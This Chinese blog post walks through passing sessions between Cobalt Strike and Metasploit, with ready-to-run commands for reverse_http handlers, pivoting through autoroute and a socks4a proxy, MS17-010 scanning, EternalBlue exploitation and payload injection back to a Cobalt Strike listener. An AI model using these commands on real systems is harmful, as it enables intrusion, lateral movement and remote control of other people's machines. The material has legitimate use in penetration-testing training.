MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击

已于 2022-04-27 22:58:54 修改
阅读量1.5k 收藏 13
点赞数 1
分类专栏: 内网渗透学习 文章标签: 安全 安全漏洞 网络安全 网络
于 2022-04-27 22:28:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/da_chuan_chuan/article/details/124461241
版权

文章目录

前言

本文主要介绍MSF与CobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。

当前网络设置为:

在这里插入图片描述

一、将CS会话派生给MSF

1、前期准备:

1)、CS上线一台主机,这里就是上线图中的跳板机
2)、因为我的MSF是在本地的kail中,需要使用frp进行代理穿透,将其映射到公网上。

在这里插入图片描述在这里插入图片描述

2、Cobaltstrike派生会话给MSF

1)CS创建新的监听器,地址为MSF地址,端口为MSF监听端口
注:这里的端口为kail里面frp中remote_port的端口

在这里插入图片描述

2)msf创建监听

1)use exploit/multi/handler 
2set payload windows/meterpreter/reverse_http 
3set lhost 127.0.0.1
4set lport 7000
5)run

在这里插入图片描述

3)cs在现有会话基础上右键选择增加会话,msf就可以接收来自CS的会话

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

二、MSF进行内网攻击

1、前言:

因为MSF上面集成了很多攻击手段,相较与CS而言,我们可以进行更好的利用,这里测试通过接收的会话为跳板机进行内网永恒之蓝攻击。

2、攻击步骤如下

1)通过当前sessions配置路由:需要回到meterpreter界面

run get_local_subnets #获取网络接口
run autoroute -p #查看路由地址
run autoroute -s 192.168.89.0/24 #添加路由地址

#注:还可以使用如下方法添加socks4代理
meterpreter> use auxiliary/server/socks4a
meterpreter> set srvport 2222
meterpreter> exploit
#配置 proxychains
vim /etc/proxychains.conf
socks4 192.168.76.132 2222 # 添加

#测试效果:
proxychains4 nmap -sT -Pn 192.168.89.3 -p3306

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

2)内网主机渗透:

#1> 检查那些主机存在MS17_010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.89.0/24
set threads 50
run
#2> 针对漏洞主机进行攻击
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/bind_tcp # 设置正向连接,因为目标在内网,所以需要设置成正向连接目标主机才能执行成功。
set rhost 192.168.89.3
run

#3> 升级shell,将shell升级为meterpretershell,这样是为了将MSF会话派生到CS
sessions -u 1 #升级shell

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

三、将MSF中的会话派生给CS

1、前言

通过MSF进行永恒之蓝攻击,拿下了新的会话,这个时候我们可以把新会话传递给CS中,进行功能互补。

2、使用步骤:

1)在CS上面设置监听:

在这里插入图片描述

2)msf配置:

1)use exploit/windows/local/payload_inject
2set payload windows/meterpreter/reverse_http
3set DisablePayloadHandler true
4set lhost x.x.x.x  #cobaltstrike监听的ip
5set lport 6789   #cobaltstrike监听的端口 
6set session 1    #这里是获得的session的id
7)run

在这里插入图片描述

总结

MSF与CobaltStrike联动同时攻击方法如上,本博客主要是自己用来记录使用流程。本人才疏学浅,还有很多不会之处,所以上述文章中肯定也有不正确的地方,针对不正确的地方欢迎各位大佬批评指出。

大川儿*
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msf攻击Mysql服务.docx
04-26
本文详细介绍了通过msf对MySQL服务器进行攻击的过程,文中列出了每一个步骤,并详细列出了使用的命令。
Cobalt Strike与Metasploit Framewor联动会话传递)功能演示
imtech的博客
02-07 525
Cobalt Strike与Metasploit Framewor联动 会话传递
Cobalt Strike渗透神器详解,【高级络安全架构师系统学习
最新发布
2301_76223496的博客
04-03 813
还有兄弟不知道络安全面试可以提前刷题吗?费时一周整理的160+络安全面试题,金九银十,做络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行渗透。 Cobalt Strike集...
CS派生会话MSF
z.mumu的博客
01-04 863
1.CS 派生会话MSF 当我们CS上线后,先打开msf,启动监听模块 然后在CS段设置一个监听 主要两边的payload一定要对应的。 然后选择需要派生会话右击—>Spawn 然后msf端等待上线就行了。
MSF和CS联动
GoDunTong's Blog
04-08 4057
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
MSF与CS之间会话传递,互相派生,版本问题踩坑
qq_29060627的博客
10-12 401
cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是cs4.5不能派生msf,得换cobaltstrike4.1的版本。
msf与cs互传shell
yy
04-19 2543
因为cobaltstrikeMSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
CS会话派生MSF会话
weixin_43047908的博客
08-16 1593
目录前言环境设置外部监听msf建立监听CS派生会话msf的shell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CS拿shell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 924
cobaltstrike攻击流程,联动msf之socks代理
msf和cs联动
bring_coco的博客
05-18 1894
环境:kali(192.168.190.128)NATAPP。
通信与络中的MSF基于组件的业务框架
11-14
 这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。  (2)媒体服务组件(MSC)  MSC用于与媒体...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
CobaltStrike4.0.zip
03-11
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Cobalt Strike与MSF联动
weixin_42035825的博客
03-29 2848
cs的会话---->msf会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
msf派生给cs
weixin_48776804的博客
07-19 534
msf派生给cs
渗透实战技巧
谢公子的博客
09-28 1万+
目录 拿下Web服务器 phpmyadmin后台getshell 后渗透第一步 派生CobaltStrike权限 获得System权限 获取账号密码 远程桌面登录 添加路由、挂Socks4a代理 域信息收集 内主机信息收集 内存活主机探测 内存活主机端口扫描 内存活主机服务探测 内横向渗透攻击技巧 MS17-010 CVE-2019-0708 pse...
CS与MSF联动派生会话
Zlirving_的博客
02-19 1619
CS 派生会话MSF 当我们CS上线后,先打开msf,启动监听模块 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost xxxx set lport xxxx exploit 然后在CS新建一个外部监听 两边的payload协议一定要对应的 然后选择需要派生会话右击—>Spawn然后选择刚刚创建的监听 MSF 派生会话给CS 先在 cs 开启监听,Cobalt Strike-&g
msf cobaltstrike
09-15
CobaltStrike是一个针对红队操作的渗透测试工具集,与Metasploit Framework(MSF)相比,Cobalt Strike已经不再使用MSF而是作为单独的平台使用。它包括一个服务端和多个客户端,可以进行分布式协同操作。Cobalt ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值